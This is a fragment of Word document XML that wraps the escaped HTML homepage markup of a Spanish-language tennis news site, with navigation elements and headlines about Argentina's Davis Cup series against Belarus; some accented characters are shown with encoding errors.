    <w:p w14:paraId="644275C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&lt;input type="hidden" id="searchsubmit" value="Buscar" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD043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&lt;/form&gt;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&lt;/div&gt;&lt;!--mvp-search-box--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87C9A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class="mvp-search-but-wrap mvp-search-click"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F3E4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5B149E8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41137DF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&lt;/div&gt;&lt;!--mvp-search-but-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D502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&lt;/div&gt;&lt;!--mvp-search-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD03C3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id="mvp-site-wall" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A38F2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id="mvp-leader-wrap"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B8B93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href="https://www.dublintravel.tur.ar" target="_blank" rel="noopener"&gt;&lt;img class="aligncenter size-full wp-image-2313" src="http://todosobretenis.com/wp-content/uploads/2020/01/Dublin-banne-gif-852x106-HOME.gif" alt="" width="852" height="106" /&gt;&lt;/a&gt;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&lt;/div&gt;&lt;!--mvp-leader-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA572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id="mvp-site-main" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08311E4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&lt;header id="mvp-main-head-wrap" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6439E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&lt;nav id="mvp-main-nav-wrap" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F1DA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id="mvp-main-nav-top" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1605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class="mvp-main-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680AC1A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id="mvp-nav-top-wrap" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4E74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class="mvp-nav-top-right-out left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19A26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class="mvp-nav-top-right-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24781CF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class="mvp-nav-top-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFBF78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class="mvp-nav-top-left-out relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135336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class="mvp-nav-top-left"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6D2AD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class="mvp-nav-soc-wrap"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4911FA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href="http://facebook.com/todosobretenis" target="_blank"&gt;&lt;span class="mvp-nav-soc-but fa fa-facebook fa-2"&gt;&lt;/span&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C71D0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href="https://twitter.com/Tsobretenis" target="_blank"&gt;&lt;span class="mvp-nav-soc-but fa fa-twitter fa-2"&gt;&lt;/span&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB1EC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href="https://www.instagram.com/todosobretenis/?hl=es" target="_blank"&gt;&lt;span class="mvp-nav-soc-but fa fa-instagram fa-2"&gt;&lt;/span&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE1C2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&lt;/div&gt;&lt;!--mvp-nav-soc-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B8A1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class="mvp-fly-but-wrap mvp-fly-but-click left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E7B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641E754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7F86D1C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722AB2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6AFEB3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&lt;/div&gt;&lt;!--mvp-fly-but-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484AA03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&lt;/div&gt;&lt;!--mvp-nav-top-left--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F1FCB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class="mvp-nav-top-left-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79711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class="mvp-nav-top-mid left relative" itemscope itemtype="http://schema.org/Organization"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF4739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class="mvp-nav-logo-reg" itemprop="url" href="http://todosobretenis.com/"&gt;&lt;img itemprop="logo" src="http://todosobretenis.com/wp-content/uploads/2019/01/tstchico-1.png" alt="Todo Sobre Tenis" data-rjs="2" /&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390277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class="mvp-nav-logo-small" href="http://todosobretenis.com/"&gt;&lt;img src="http://todosobretenis.com/wp-content/uploads/2019/01/tstchico.png" alt="Todo Sobre Tenis" data-rjs="2" /&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAAF8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&lt;h1 class="mvp-logo-title"&gt;Todo Sobre Tenis&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CBA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&lt;/div&gt;&lt;!--mvp-nav-top-mid--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3368B09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&lt;/div&gt;&lt;!--mvp-nav-top-left-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C16B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&lt;/div&gt;&lt;!--mvp-nav-top-left-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10D76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&lt;/div&gt;&lt;!--mvp-nav-top-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D24719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&lt;/div&gt;&lt;!--mvp-nav-top-right-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26B2A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class="mvp-nav-top-right"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799F9F3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class="mvp-nav-search-but fa fa-search fa-2 mvp-search-click"&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAC84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&lt;/div&gt;&lt;!--mvp-nav-top-right--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2476766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&lt;/div&gt;&lt;!--mvp-nav-top-right-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA9834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&lt;/div&gt;&lt;!--mvp-nav-top-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551DC1D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&lt;/div&gt;&lt;!--mvp-main-box--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A20B9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&lt;/div&gt;&lt;!--mvp-main-nav-top--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A308A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id="mvp-main-nav-bot" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398ED6A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id="mvp-main-nav-bot-cont" class="left"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD167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class="mvp-main-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E29DC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id="mvp-nav-bot-wrap" class="left"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCAD17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class="mvp-nav-bot-right-out left"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D3F3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class="mvp-nav-bot-right-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26413EB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class="mvp-nav-bot-cont left"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30108D4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class="mvp-nav-bot-left-out"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06080A7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class="mvp-nav-bot-left left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D859FB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class="mvp-fly-but-wrap mvp-fly-but-click left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D03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47856A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646230D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25F9D3D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&lt;span&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C41EB5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&lt;/div&gt;&lt;!--mvp-fly-but-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDBCC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&lt;/div&gt;&lt;!--mvp-nav-bot-left--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466FC7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class="mvp-nav-bot-left-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953D54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class="mvp-nav-menu left"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302B17F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class="menu-mobila-container"&gt;&lt;ul id="menu-mobila-1" class="menu"&gt;&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-79 current_page_item menu-item-1619"&gt;&lt;a href="http://todosobretenis.com/"&gt;Home&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0043E1B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 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1620"&gt;&lt;a href="http://todosobretenis.com/escribi-en-la-web/"&gt;EscribÃ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 xml:space="preserve"> en la web&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735C6D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 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1621"&gt;&lt;a href="http://todosobretenis.com/anuncia-en-tst/"&gt;Anuncia en TST&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751954B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&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1622"&gt;&lt;a href="http://todosobretenis.com/sobre-nosotros/"&gt;Sobre Nosotros&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D48E7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&lt;/ul&gt;&lt;/div&gt;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&lt;/div&gt;&lt;!--mvp-nav-menu--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606AEAF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&lt;/div&gt;&lt;!--mvp-nav-bot-left-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4B6E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&lt;/div&gt;&lt;!--mvp-nav-bot-left-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A8DB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&lt;/div&gt;&lt;!--mvp-nav-bot-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A45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&lt;/div&gt;&lt;!--mvp-nav-bot-right-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472796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class="mvp-nav-bot-right left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2FDA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class="mvp-nav-search-but fa fa-search fa-2 mvp-search-click"&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5ABB2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&lt;/div&gt;&lt;!--mvp-nav-bot-right--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA90D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&lt;/div&gt;&lt;!--mvp-nav-bot-right-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6222B75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&lt;/div&gt;&lt;!--mvp-nav-bot-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E0190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&lt;/div&gt;&lt;!--mvp-main-nav-bot-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E44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&lt;/div&gt;&lt;!--mvp-main-box--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2213D7A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&lt;/div&gt;&lt;!--mvp-main-nav-bot--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E44082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&lt;/nav&gt;&lt;!--mvp-main-nav-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F91F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&lt;/header&gt;&lt;!--mvp-main-head-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B833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id="mvp-main-body-wrap" class="left relative"&gt;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class="mvp-main-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF5E24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&lt;section id="mvp-feat1-wrap" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF7471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class="mvp-feat1-right-out left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057004B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class="mvp-feat1-right-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571D0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class="mvp-feat1-main left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66E68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class="mvp-feat1-left-wrap relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6E25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href="http://todosobretenis.com/argentina-y-brasil-clasificaron-a-los-qualifiers-de-copa-davis/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05463C3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class="mvp-feat1-feat-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281A3B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class="mvp-feat1-feat-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727255C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width="560" height="600" src="http://todosobretenis.com/wp-content/uploads/2021/09/321482-560x600.jpeg" class="attachment-mvp-port-thumb size-mvp-port-thumb wp-post-image" alt=""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&lt;/div&gt;&lt;!--mvp-feat1-feat-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2750C8D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class="mvp-feat1-feat-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134F5E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7CB9CE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694F23E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1C215AE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class="mvp-stand-title"&gt;Argentina y Brasil clasificaron a los Qualifiers de Copa Davis&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A8AD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&lt;p&gt;PerÃº tambiÃ©n ganÃ³ y jugarÃ¡ un repechaje en noviembre, mientras que Chile, Uruguay y Bolivia cayeron este fin de semana.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50271EC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&lt;/div&gt;&lt;!--mvp-feat1-feat-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D53CD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&lt;/div&gt;&lt;!--mvp-feat1-feat-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B0D6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38EA67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class="mvp-feat1-sub-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729654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href="http://todosobretenis.com/gaudio-confirmo-su-salida-del-equipo-de-copa-davis/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C27BD0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class="mvp-feat1-sub-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B93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class="mvp-feat1-sub-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A3AD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width="590" height="354" src="http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-590x354.jpeg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-590x354.jpeg 590w, http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-400x240.jpeg 400w" sizes="(max-width: 590px) 100vw, 590px"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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-400x240.jpeg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-590x354.jpeg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&lt;/div&gt;&lt;!--mvp-feat1-sub-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763BD0E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class="mvp-feat1-sub-text"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA837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72239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070F878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9CDE4C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&lt;h2&gt;Gaudio confirmÃ³ su salida del equipo de Copa Davis&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACFB2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&lt;/div&gt;&lt;!--mvp-feat1-sub-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03192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&lt;/div&gt;&lt;!--mvp-feat1-sub-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8E6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3D8F35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href="http://todosobretenis.com/argentina-sello-la-serie-ante-bielorrusia/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC2DB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class="mvp-feat1-sub-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5973A36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class="mvp-feat1-sub-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44503D9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width="570" height="321" src="http://todosobretenis.com/wp-content/uploads/2021/09/i-e1632075421705.jpeg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/i-e1632075421705.jpeg 570w, http://todosobretenis.com/wp-content/uploads/2021/09/i-e1632075421705-300x169.jpeg 300w" sizes="(max-width: 570px) 100vw, 570px"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src="http://todosobretenis.com/wp-content/uploads/2021/09/i-e1632075421705-400x240.jpeg" class="mvp-mob-img wp-post-image" alt=""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&lt;/div&gt;&lt;!--mvp-feat1-sub-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556E8B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class="mvp-feat1-sub-text"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BD80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70A78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7BAD42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56AA66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&lt;h2&gt;Argentina sellÃ³ la serie ante Bielorrusia con una categÃ³rica victoria de Schwartzman&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D9D8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&lt;/div&gt;&lt;!--mvp-feat1-sub-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4910DF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&lt;/div&gt;&lt;!--mvp-feat1-sub-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276823D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1345FD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&lt;/div&gt;&lt;!--mvp-feat1-sub-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314DF9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&lt;/div&gt;&lt;!--mvp-feat1-left-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B0CA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class="mvp-feat1-mid-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0230B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&lt;h3 class="mvp-feat1-pop-head"&gt;&lt;span class="mvp-feat1-pop-head"&gt;Popular&lt;/span&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1313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class="mvp-feat1-pop-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD129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href="http://todosobretenis.com/schwartzman-abrira-la-serie-ante-bielorrusia/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481FFEF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class="mvp-feat1-pop-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84C27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class="mvp-feat1-pop-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1625115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src="http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-400x240.jpeg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-590x354.jpeg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src="http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-80x80.jpeg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-150x150.jpeg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&lt;/div&gt;&lt;!--mvp-feat1-pop-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271632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class="mvp-feat1-pop-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1990F6A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953C8A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4E46646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D87595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&lt;h2&gt;Schwartzman abrirÃ¡ la serie de Copa Davis ante Bielorrusia&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7ABA0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&lt;/div&gt;&lt;!--mvp-feat1-pop-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3FF94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&lt;/div&gt;&lt;!--mvp-feat1-pop-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A3AD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3ABFDFC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href="http://todosobretenis.com/dura-derrota-de-schwartzman-y-contundente-victoria-de-pella-ante-bielorrusia/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8024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class="mvp-feat1-pop-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C15C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class="mvp-feat1-pop-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595BCE0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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-400x240.jpeg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-590x354.jpeg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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-80x80.jpeg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-150x150.jpeg 150w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-300x300.jpeg 300w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-768x768.jpeg 768w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-1024x1024.jpeg 1024w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft.jpeg 1080w"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&lt;/div&gt;&lt;!--mvp-feat1-pop-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCBE5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class="mvp-feat1-pop-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481FB00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02AFF56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336523A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A15142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&lt;h2&gt;Dura derrota de Schwartzman y contundente victoria de Pella ante Bielorrusia&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3419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&lt;/div&gt;&lt;!--mvp-feat1-pop-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E8D9E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&lt;/div&gt;&lt;!--mvp-feat1-pop-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC8A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3E4BB63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href="http://todosobretenis.com/schwartzman-estaba-en-un-dia-en-el-que-nada-iba-a-salir/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799ACFA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class="mvp-feat1-pop-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431CE17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class="mvp-feat1-pop-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46020A5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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-400x240.jpeg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-590x354.jpeg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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-80x80.jpeg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-150x150.jpeg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&lt;/div&gt;&lt;!--mvp-feat1-pop-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575468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class="mvp-feat1-pop-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C474F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36C4DF8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39C0BE3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324E6BA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&lt;h2&gt;Schwartzman: &amp;#8220;&amp;#8221;Estaba en un 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 en el que nada iba a salir&amp;#8221;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05856C9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&lt;/div&gt;&lt;!--mvp-feat1-pop-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA3C52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&lt;/div&gt;&lt;!--mvp-feat1-pop-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF636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5A243D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href="http://todosobretenis.com/argentina-vs-bielorrusia-marcaria-la-despedida-de-gaston-gaudio/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5954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class="mvp-feat1-pop-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D00723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class="mvp-feat1-pop-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B40B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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-400x240.jpeg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-590x354.jpeg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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-80x80.jpeg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-150x150.jpeg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&lt;/div&gt;&lt;!--mvp-feat1-pop-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F5D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class="mvp-feat1-pop-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093560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7F58833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01AFB18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C3B216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&lt;h2&gt;Argentina vs Bielorrusia marcarÃ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 la despedida de GastÃ³n Gaudio&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D223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&lt;/div&gt;&lt;!--mvp-feat1-pop-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429698D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&lt;/div&gt;&lt;!--mvp-feat1-pop-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2672F3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2F775C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href="http://todosobretenis.com/un-total-de-10-paises-buscan-la-clasificacion-a-los-qualifiers-de-la-copa-davis/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6EBE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class="mvp-feat1-pop-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558908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class="mvp-feat1-pop-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0513B6A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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-400x240.jpeg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-590x354.jpeg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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-80x80.jpeg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-150x150.jpeg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&lt;/div&gt;&lt;!--mvp-feat1-pop-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053D63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class="mvp-feat1-pop-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4E3E9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3C336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0301BBE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492742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&lt;h2&gt;Un total de 10 paÃ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ses buscan la clasificaciÃ³n a los Qualifiers de la Copa Davis&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317F7B0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&lt;/div&gt;&lt;!--mvp-feat1-pop-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E96A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&lt;/div&gt;&lt;!--mvp-feat1-pop-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190559F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7D59D49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&lt;/div&gt;&lt;!--mvp-feat1-pop-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C9C1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&lt;/div&gt;&lt;!--mvp-feat1-mid-wrap--&gt;</w:t>
      </w:r>
    </w:p>
